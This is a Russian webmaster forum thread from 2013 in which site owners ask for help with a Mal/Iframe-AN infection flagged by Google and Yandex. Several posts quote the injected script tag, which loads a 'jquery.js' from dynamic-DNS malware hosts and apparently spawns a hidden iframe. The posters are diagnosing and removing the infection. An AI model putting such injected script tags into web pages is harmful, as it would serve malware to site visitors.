Прошу помощи Mal/Iframe-AN

OT
На сайте с 02.06.2011
Offline
22
#11

Такая же ситуация. Гугл ругается на код

<script type="text/javascript" src="//domn1381232733.servep2

p.com/jquery.js?1381232830">

На сайте DLE 10, лицензия, скачанная с офф сайта. Двиг установил чуть больше недели назад, сразу после установки поставил скрипт, который записывает все изменения файлов на сайте. Судя по его отчёту - файлы на сайте не редактировались.

Уже даже не знаю где копать.

TF-Studio
На сайте с 17.08.2010
Offline
334
#12
Сервер не найден

Ссылки нормальные можно?

Скорее всего там вирус.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
R
На сайте с 25.01.2012
Offline
102
#13

Аналогичная проблема.

Тоже на основном сайте вирус Mal/Iframe-AN , а на других вирус "поведенческий анализ"

---------- Добавлено 09.10.2013 в 19:04 ----------

http://domn1381329907.noip.me/jquery.js?1381330003

вот это нашел сканер вируса предложенный в этой теме.

также писал письмо Платону в яндекс, они ответили следующее:

Спасибо за письмо. Мы проверили, вредоносный код, вызвавший реакцию антивируса, был обнаружен не на страницах Вашего сайта, но на страницах основного домена ****.ru . Пример вредоносного скрипта приводим:

<script type="text/javascript" src="//domn1381104064.servep2p.com/jquery.js?1381104160"></script

Вскоре после того, как вредоносный код будет удален со страницы, наш антивирус перепроверит сайт и, если вредоносный код более не будет обнаружен, пометка с сайта и его поддоменов в выдаче снимется.

---------- Добавлено 09.10.2013 в 19:08 ----------

Смотрел исходный код страниц, где он якобы обнаружен. Ничего не нашел.

TF-Studio
На сайте с 17.08.2010
Offline
334
#14

Сайт-то покажите, гадать что ли?

Возможно по ЮА подмена просто идет, к примеру - только мобильные юзеры, или авторизованные, много вариантов.

R
На сайте с 24.01.2008
Offline
180
#15
Odine:
А вот это что такое не подскажете "_ttp://domn1381298465.noip.me/jquery.js?1381298561"

В смысле это нормально?
А то я просто не понимаю что это.

По ссылке ява не доступен, если вы это сами не ставили возможно это и не ваше, вообще внешний не всегда можно сказать что на сайте вирус, нужно проверять сам код.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
OG
На сайте с 09.10.2013
Offline
2
#16
А вот это что такое не подскажете "_ttp://domn1381298465.noip.me/jquery.js?1381298561"
Rxp:
По ссылке ява не доступен...

С американского ip на сайт ТС зайдите - увидите. Во всяком случае вчера был на месте: с него грузился скрипт, из которого получается iframe с url 'наборбукв'.'хост'.cc:8080 (был не доступен).

I
На сайте с 14.10.2013
Offline
0
iwa
#17

Здравствуйте.

Тоже DLE сайт online-library.ru

Аналогичная проблема не могу найти где прячется.

Гугл вот что пишет.

Число доменов, на которых размещается вредоносное ПО: 4 (в том числе domn1381232733.servep2p.com/, domn1381222863.servep2p.com/, cmisstunumhmtropr.homelinux.com/).

Число доменов, предположительно используемых в качестве промежуточных звеньев для распространения вредоносного ПО: 1 (в том числе noip.me/).

Сканер который порекомендовали тоже нашел http://rdomn1381787103.noip.me/jquery.js?1381787205

S
На сайте с 18.10.2013
Offline
0
#18

Утро доброе, кто-нибудь решил проблему с этой гадостью?

Месяц назад улетело с ним 3 сайта на одном хостинге в одном аккаунте, сайты на джумле и вп. Откаты(восстанавливал состояние сайта на полгода назад, ставил проверку файлов на изменение), фаерволы и закрытие всего что можно не помогали, проверка ничего не дала, нет ни сторонних ссылок, ни base64, ничего. Перепроверки вебмастеров по очереди блокировали сайт.

Иногда блокировал только гугл или только яндекс, помог только перенос сайта на другой хостинг, в качестве эксперимента переносился «зараженный» сайт, то есть то состояние его, которое блокировалось с вирусом на старой площадке.

Сегодня вылетел еще один сайт, получается, что проблемы именно на стороне хостинга?

Перенесенные на другой хостинг работают уже как месяц и чистые тьфу-тьфу-тьфу

mobilife
На сайте с 10.10.2009
Offline
144
#19

Подобная ерунда и у меня возникла несколько дней назад, позавчера вообще Яндекс пометил 6 сайтов вредоносным сообщением, в Вердикте указал помимо поведенческого анализа, еще и такое - Yandex/RegExpBlacklistedTag - кто-нибудь знает что это значит?

Писал им по поводу поведенческого анализа, они мне ответили, что их робот обнаружил какую-то такую дрянь - <script type="text/javascript" src="//rdomn1383791404.hopto.me/jquery.js?1383791504"></script> - но нигде на сайтах ее не получается обнаружить, уже все перебрали, но эффекта 0. Как-будто эта зараза, то появляется, то снова пропадает и Яндекс сначала реагирует на нее, потом может написать что сайт чист, а через несколько дней снова все по кругу...

Мои услуги: Крауд ссылки, соц сигналы и др. / (/ru/forum/994667)Вечные ссылки в статьях / (/ru/forum/997379)Ссылки в Яндекс сервисах / (/ru/forum/1007355)Блоги (/ru/forum/1007357)
P
На сайте с 28.03.2010
Offline
35
#20
mobilife:
Подобная ерунда и у меня возникла несколько дней назад, позавчера вообще Яндекс пометил 6 сайтов вредоносным сообщением, в Вердикте указал помимо поведенческого анализа, еще и такое - Yandex/RegExpBlacklistedTag - кто-нибудь знает что это значит?
Писал им по поводу поведенческого анализа, они мне ответили, что их робот обнаружил какую-то такую дрянь - <script type="text/javascript" src="//rdomn1383791404.hopto.me/jquery.js?1383791504"></script> - но нигде на сайтах ее не получается обнаружить, уже все перебрали, но эффекта 0. Как-будто эта зараза, то появляется, то снова пропадает и Яндекс сначала реагирует на нее, потом может написать что сайт чист, а через несколько дней снова все по кругу...

Аналогичная ситауция, вплоть до кода. Ничего не нашел на сайте, все облазил. Любая инфа будет полезна...

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий